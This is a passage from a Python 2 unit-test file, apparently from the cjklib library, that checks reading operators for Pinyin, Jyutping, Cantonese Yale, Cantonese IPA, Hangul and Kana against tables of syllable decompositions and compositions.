if type(clss) in [types.TypeType, types.ClassType] \
and issubclass(clss, ReadingOperatorConsistencyTest) \
and clss.READING_NAME]
return testClasses
class ReadingOperatorReferenceTest(ReadingOperatorTest):
"""
Base class for testing of references against
:class:`~cjklib.reading.operator.ReadingOperator` classes.
These tests assure that the given values are returned correctly.
"""
DECOMPOSITION_REFERENCES = []
"""
References to test ``decompose()`` operation.
List of dialect/reference tuples, schema: ({dialect}, [(reference, target)])
"""
COMPOSITION_REFERENCES = []
"""
References to test ``compose()`` operation.
    List of dialect/reference tuples, schema: ({dialect}, [(reference, target)])
"""
READING_ENTITY_REFERENCES = []
"""
References to test ``isReadingEntity()`` operation.
    List of dialect/reference tuples, schema: ({dialect}, [(reference, target)])
"""
GUESS_DIALECT_REFERENCES = []
"""
References to test ``guessReadingDialect()`` operation.
    List of reference/dialect tuples, schema: (reference, {dialect})
"""
def testDecompositionReferences(self):
"""Test if the given decomposition references are reached."""
for dialect, references in self.DECOMPOSITION_REFERENCES:
for reference, target in references:
args = [reference, self.READING_NAME]
if type(target) in [types.TypeType, types.ClassType] \
and issubclass(target, Exception):
self.assertRaises(target, self.f.decompose, *args,
**dialect)
else:
try:
decomposition = self.f.decompose(*args, **dialect)
self.assertEquals(decomposition, target,
"Decomposition %s of %s not reached: %s" \
% (repr(target), repr(reference),
repr(decomposition)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.DecompositionError, e:
self.fail(
'DecompositionError for %s with target %s: %s' \
% (repr(reference), repr(target), repr(e)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testCompositionReferences(self):
"""Test if the given composition references are reached."""
for dialect, references in self.COMPOSITION_REFERENCES:
for reference, target in references:
args = [reference, self.READING_NAME]
if type(target) in [types.TypeType, types.ClassType] \
and issubclass(target, Exception):
self.assertRaises(target, self.f.compose, *args, **dialect)
else:
try:
composition = self.f.compose(*args, **dialect)
self.assertEquals(composition, target,
"Composition %s of %s not reached: %s" \
% (repr(target), repr(reference),
repr(composition)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
except exception.CompositionError, e:
self.fail('CompositionError for %s with target %s: %s' \
% (repr(reference), repr(target), repr(e)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testEntityReferences(self):
"""Test if the given entity references are accepted/rejected."""
for dialect, references in self.READING_ENTITY_REFERENCES:
for reference, target in references:
result = self.f.isReadingEntity(reference,
self.READING_NAME, **dialect)
self.assertEquals(result, target,
"Target %s of %s not reached: %s" \
% (repr(target), repr(reference), repr(result)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testGuessDialectReferences(self):
"""Test if ``guessReadingDialect()`` guesses the needed options."""
if not hasattr(self.readingOperatorClass, 'guessReadingDialect'):
return
for reference, dialect in self.GUESS_DIALECT_REFERENCES:
result = self.readingOperatorClass.guessReadingDialect(reference)
for option, value in dialect.items():
self.assert_(option in result,
"Guessed dialect doesn't include option %s" \
% repr(option) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
self.assertEquals(result[option], value,
"Target for option %s=%s not reached for %s: %s" \
% (repr(option), repr(value), repr(reference),
repr(result[option])) \
+ ' (reading %s)' % self.READING_NAME)
class CantoneseIPAOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'CantoneseIPA'
DIALECTS = crossDict(
[{}, {'toneMarkType': 'numbers'}, {'toneMarkType': 'chaoDigits'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'numbers', 'firstToneName': 'HighFalling'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore',
'firstToneName': 'HighFalling'},
{'toneMarkType': 'chaoDigits', 'missingToneMark': 'ignore'},
#{'toneMarkType': 'diacritics'}, # TODO NotImplementedError
#{'toneMarkType': 'diacritics', 'missingToneMark': 'ignore'},
{'toneMarkType': 'none'}],
[{}, {'stopTones': 'general'}, {'stopTones': 'explicit'}],
)
@staticmethod
def testUpperCase(dialect):
return False
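    # Cantonese IPA makes no upper/lower case distinction, so the upper-case
    # round trip in testGetTonalEntityOfSplitEntityToneIsIdentity is skipped.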
def cleanDecomposition(self, decomposition, reading, **options):
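        # Drop the '.' separators so the decomposition can be compared against
        # the original entity pair in testDecomposeKeepsSyllablePairs.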
return [entity for entity in decomposition if entity != '.']
def testEntityCountConstant(self):
"""
Test if the number of reading entities reported by
``getReadingEntities()`` is constant between different stop tone
realisations.
"""
if not hasattr(self.readingOperatorClass, "getReadingEntities"):
return
entityCount = None
for stopTones in ['none', 'general', 'explicit']:
count = len(self.f.getReadingEntities(self.READING_NAME,
stopTones=stopTones))
            if entityCount is None:
                # remember the first realisation's count as the reference value
                entityCount = count
            else:
                self.assertEquals(entityCount, count)
def testReportedToneValid(self):
"""
Test if the tone reported by ``splitEntityTone()`` is valid for the given
entity.
"""
if not hasattr(self.readingOperatorClass, "isToneValid"):
return
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
ipaOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
entities = ipaOperator.getReadingEntities()
for entity in entities:
plainEntity, tone = ipaOperator.splitEntityTone(entity)
self.assert_(ipaOperator.isToneValid(plainEntity, tone),
"Tone %s is invalid with plain entity %s" \
% (repr(tone), repr(plainEntity)) \
+ ' (reading %s, dialect %s)' \
% (self.READING_NAME, dialect))
def testBaseExplicitTones(self):
"""
Test if the tones reported by ``getBaseTone()`` and ``getExplicitTone()``
are valid.
"""
forms = []
forms.extend(self.DIALECTS)
if {} not in forms:
forms.append({})
for dialect in forms:
ipaOperator = self.f.createReadingOperator(self.READING_NAME,
**dialect)
for tone in ipaOperator.getTones():
                baseTone = ipaOperator.getBaseTone(tone)
                self.assert_(baseTone is None or baseTone in ipaOperator.TONES)
entities = ipaOperator.getPlainReadingEntities()
for plainEntity in entities:
for tone in ipaOperator.getTones():
try:
explicitTone = ipaOperator.getExplicitTone(plainEntity,
tone)
self.assert_(explicitTone == None \
or explicitTone in ipaOperator.TONES \
or explicitTone in ipaOperator.STOP_TONES_EXPLICIT)
except exception.InvalidEntityError:
pass
# TODO
#class CantoneseIPAOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'CantoneseIPA'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class CantoneseYaleOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'CantoneseYale'
DIALECTS = crossDict(
[{}, {'strictDiacriticPlacement': True}, {'toneMarkType': 'numbers'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'numbers', 'yaleFirstTone': '1stToneFalling'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore',
'yaleFirstTone': '1stToneFalling'},
{'toneMarkType': 'none'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
)
# TODO
class CantoneseYaleOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'CantoneseYale'
DECOMPOSITION_REFERENCES = [
({}, [
(u'gwóngjàuwá', [u'gwóng', u'jàu', u'wá']),
(u'yuhtyúh', [u'yuht', u'yúh']),
(u'néihhóu', [u'néih', u'hóu']),
(u'gwóngjaù', [u'gwóng', u'jaù']), # wrong placement of tone
(u'GWÓNGJÀUWÁ', [u'GWÓNG', u'JÀU', u'WÁ']),
(u'sīsísisìhsíhsihsīksiksihk', [u'sī', u'sí', u'si', u'sìh', u'síh',
u'sih', u'sīk', u'sik', u'sihk']),
(u'SÌSÍSISÌHSÍHSIHSĪKSIKSIHK', [u'SÌ', u'SÍ', u'SI', u'SÌH', u'SÍH',
u'SIH', u'SĪK', u'SIK', u'SIHK']),
]),
({'toneMarkType': 'numbers'}, [
(u'gwong2jau1wa2', [u'gwong2', u'jau1', u'wa2']),
(u'yut6yu5', [u'yut6', u'yu5']),
(u'nei5hou2', [u'nei5', u'hou2']),
(u'GWONG2JAU1WA2', [u'GWONG2', u'JAU1', u'WA2']),
(u'si1si2si3si4si5si6sik1sik3sik6', [u'si1', u'si2', u'si3', u'si4',
u'si5', u'si6', u'sik1', u'sik3', u'sik6']),
(u'SI1SI2SI3SI4SI5SI6SIK1SIK3SIK6', [u'SI1', u'SI2', u'SI3', u'SI4',
u'SI5', u'SI6', u'SIK1', u'SIK3', u'SIK6']),
]),
({'strictDiacriticPlacement': True}, [
(u'gwóngjàuwá', [u'gwóng', u'jàu', u'wá']),
(u'yuhtyúh', [u'yuht', u'yúh']),
(u'néihhóu', [u'néih', u'hóu']),
(u'gwóngjaù', [u'gwóngjaù']), # wrong placement of tone
])
]
COMPOSITION_REFERENCES = [
({}, [
([u'gwóng', u'jàu', u'wá'], u'gwóngjàuwá'),
([u'yuht', u'yúh'], u'yuhtyúh'),
([u'gwóng', u'jaù'], u'gwóngjaù'), # wrong placement of tone
([u'GWÓNG', u'JÀU', u'WÁ'], u'GWÓNGJÀUWÁ'),
([u'sī', u'sí', u'si', u'sìh', u'síh', u'sih', u'sīk', u'sik',
u'sihk'], u'sīsísisìhsíhsihsīksiksihk'),
([u'SÌ', u'SÍ', u'SI', u'SÌH', u'SÍH', u'SIH', u'SĪK', u'SIK',
u'SIHK'], u'SÌSÍSISÌHSÍHSIHSĪKSIKSIHK'),
]),
({'toneMarkType': 'numbers'}, [
([u'gwong2', u'jau1', u'wa2'], u'gwong2jau1wa2'),
([u'yut6', u'yu5'], u'yut6yu5'),
([u'GWONG2', u'JAU1', u'WA2'], u'GWONG2JAU1WA2'),
([u'si1', u'si2', u'si3', u'si4', u'si5', u'si6', u'sik1', u'sik3',
u'sik6'], u'si1si2si3si4si5si6sik1sik3sik6'),
([u'SI1', u'SI2', u'SI3', u'SI4', u'SI5', u'SI6', u'SIK1', u'SIK3',
u'SIK6'], u'SI1SI2SI3SI4SI5SI6SIK1SIK3SIK6'),
]),
({'strictDiacriticPlacement': True}, [
([u'gwóng', u'jàu', u'wá'], u'gwóngjàuwá'),
([u'yuht', u'yúh'], u'yuhtyúh'),
([u'gwóng', u'jaù'], exception.CompositionError),
# wrong placement of tone
([u'jau\u0300', u'gwóng'], exception.CompositionError),
# wrong placement of tone
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
([u'gwong2', u'jau1', u'wa2'], u'gwong2jau1wa2'),
([u'gwong2', u'jau', u'wa2'], exception.CompositionError),
])
]
READING_ENTITY_REFERENCES = [
({}, [
(u'wā', True),
(u'gwóng', True),
(u'jàu', True),
(u'wá', True),
(u'néih', True),
(u'yuht', True),
(u'gwong', True),
(u'wa\u0304', True),
(u'jaù', True),
(u'gwongh', True),
(u'wáa', False),
(u'GWÓNG', True),
(u'SIK', True),
(u'bàt', False), # stop tone
(u'bat4', False), # stop tone
]),
({'strictDiacriticPlacement': True}, [
(u'wā', True),
(u'gwóng', True),
(u'jàu', True),
(u'wá', True),
(u'néih', True),
(u'yuht', True),
(u'gwong', True),
(u'wa\u0304', True),
(u'jaù', False),
(u'gwongh', False),
(u'wáa', False),
(u'GWÓNG', True),
(u'SIK', True),
(u'bàt', False), # stop tone
(u'bat4', False), # stop tone
]),
({'case': 'lower'}, [
(u'wā', True),
(u'gwóng', True),
(u'jàu', True),
(u'wá', True),
(u'néih', True),
(u'yuht', True),
(u'gwong', True),
(u'wa\u0304', True),
(u'jaù', True),
(u'gwongh', True),
(u'wáa', False),
(u'GWÓNG', False),
(u'SIK', False),
(u'bàt', False), # stop tone
(u'bat4', False), # stop tone
]),
]
GUESS_DIALECT_REFERENCES = [
(u"Mh", {'toneMarkType': 'diacritics'}),
(u"YUHT", {'toneMarkType': 'diacritics'}),
(u"yuht", {'toneMarkType': 'diacritics'}),
(u"wā", {'toneMarkType': 'diacritics'}),
(u"gwong2", {'toneMarkType': 'numbers'}),
]
class JyutpingOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Jyutping'
DIALECTS = crossDict(
[{}, {'missingToneMark': 'ignore'}, {'toneMarkType': 'none'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
)
# TODO
class JyutpingOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'Jyutping'
DECOMPOSITION_REFERENCES = [
({}, [
(u'gwong2zau1waa2', [u'gwong2', u'zau1', u'waa2']),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u'gwong2', u'zau1', u'waa2'], u'gwong2zau1waa2'),
]),
({'missingToneMark': 'ignore'}, [
([u'gwong2', u'zau1', u'waa2'], u'gwong2zau1waa2'),
([u'gwong2', u'zau', u'waa2'], exception.CompositionError),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u'si1', True),
(u'si2', True),
(u'si3', True),
(u'si4', True),
(u'si5', True),
(u'si6', True),
(u'sik1', True),
(u'sik2', False), # stop tone
(u'sik3', True),
(u'sik4', False), # stop tone
(u'sik5', False), # stop tone
(u'sik6', True),
]),
]
class HangulOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Hangul'
# TODO
class HangulOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'Hangul'
DECOMPOSITION_REFERENCES = [
({}, [
(u"한글은 한국어의 고유", [u"한", u"글", u"은", u" ",
u"한", u"국", u"어", u"의", u" ", u"고", u"유"]),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u"한", u"글", u"은", u" ", u"한", u"국", u"어", u"의", u" ", u"고",
u"유"], u"한글은 한국어의 고유"),
]),
]
READING_ENTITY_REFERENCES = []
class HiraganaOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Hiragana'
# TODO
#class HiraganaOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'Hiragana'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class KatakanaOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Katakana'
# TODO
#class KatakanaOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'Katakana'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class KanaOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Kana'
# TODO
#class KanaOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'Kana'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class PinyinOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Pinyin'
def _noToneApostropheRule(operatorInst, precedingEntity, followingEntity):
return precedingEntity and precedingEntity[0].isalpha() \
and not precedingEntity[-1].isdigit() \
and followingEntity[0].isalpha()
noToneApostropheRule = staticmethod(_noToneApostropheRule)
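    # Custom apostrophe rule passed to the operator via the dialect option
    # 'pinyinApostropheFunction' below; wrapped as a staticmethod so it is
    # handed over unbound instead of as a bound method of the test case.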
DIALECTS = crossDict(
[{}, {'toneMarkType': 'numbers'},
{'toneMarkType': 'numbers', 'missingToneMark': 'fifth'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'numbers', 'yVowel': 'v'},
{'toneMarkType': 'numbers', 'yVowel': 'uu'},
{'toneMarkType': 'none'},
{'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0306', u'\u0300')},
{'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0302', u'\u0300')},
{'strictDiacriticPlacement': True}],
[{}, {'pinyinApostrophe': u'’'}],
[{}, {'pinyinApostropheFunction': _noToneApostropheRule}],
[{}, {'erhua': 'oneSyllable'}, {'erhua': 'ignore'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
[{}, {'shortenedLetters': True}],
)
def cleanDecomposition(self, decomposition, reading, **options):
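        # compose() inserts apostrophes that are not reading entities; remove
        # them (reusing a small cache of operator instances) before comparing
        # with the original entity pair.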
if not hasattr(self, '_operators'):
self._operators = []
for operatorReading, operatorOptions, op in self._operators:
if reading == operatorReading and options == operatorOptions:
break
else:
op = self.f.createReadingOperator(reading, **options)
self._operators.append((reading, options, op))
return op.removeApostrophes(decomposition)
class PinyinOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'Pinyin'
DECOMPOSITION_REFERENCES = [
({}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peí', u'nǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀN", u"MÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
(u'tiananmen', exception.DecompositionError),
(u'zhīshi', [u'zhī', 'shi']),
]),
({'toneMarkType': 'numbers'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ānmén"]),
("xian", ["xian"]),
(u"xīān", [u"xīān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peínǐ']), # wrong placement of tone
(u"hónglùo", [u'hónglùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ānmén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀNMÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ānmén"]),
("xian", ["xian"]),
(u"xīān", [u"xīān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"anmen"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peínǐ']), # wrong placement of tone
(u"hónglùo", [u'hónglùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ānmén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀNMÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'erhua': 'oneSyllable'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peí', u'nǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀN", u"MÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'strictDiacriticPlacement': True}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peínǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lù', u'o']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀN", u"MÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'case': 'lower'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peí', u'nǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀNMÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'toneMarkType': 'numbers', 'yVowel': 'v'}, [
(u'nv3hai2', [u'nv3', u'hai2']),
(u'nvhai', [u'nv', 'hai']),
(u'nü3hai2', [u'nü3', u'hai2']),
(u'nühai', [u'nühai']),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], u"e'r"),
([u"ti", u"anr"], exception.CompositionError),
([u"chang", u"an"], u"chang'an"),
([u"ĉaŋ", u"an"], exception.CompositionError),
]),
({'toneMarkType': 'numbers'}, [
([u"tiān", u"ān", u"mén"], u"tiānānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xīān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1'an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3'ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀNĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1'AN1MEN2", ),
([u"e", u"r"], u"e'r"),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
([u"tiān", u"ān", u"mén"], u"tiānānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xīān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian", u"an", u"men"], u"tiananmen"),
([u"xi1", u"an1"], u"xi1'an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3'ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀNĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1'AN1MEN2", ),
([u"e5", u"r5"], u"e5'r5"),
]),
({'erhua': 'oneSyllable'}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], exception.CompositionError),
]),
({'toneMarkType': 'numbers', 'erhua': 'oneSyllable'}, [
([u"tiān", u"ān", u"mén"], u"tiānānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xīān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1'an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3'angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3'ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀNĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1'AN1MEN2", ),
([u"e", u"r"], exception.CompositionError),
]),
({'strictDiacriticPlacement': True}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], exception.CompositionError),
# wrong placement of tone
([u'hóng', u'lùo'], exception.CompositionError),
# wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], u"e'r"),
]),
({'toneMarkType': 'numbers', 'yVowel': 'v'}, [
([u'nv3', u'hai2'], u'nv3hai2'),
([u'nü3', u'hai2'], u'nü3hai2'),
]),
({'shortenedLetters': True}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
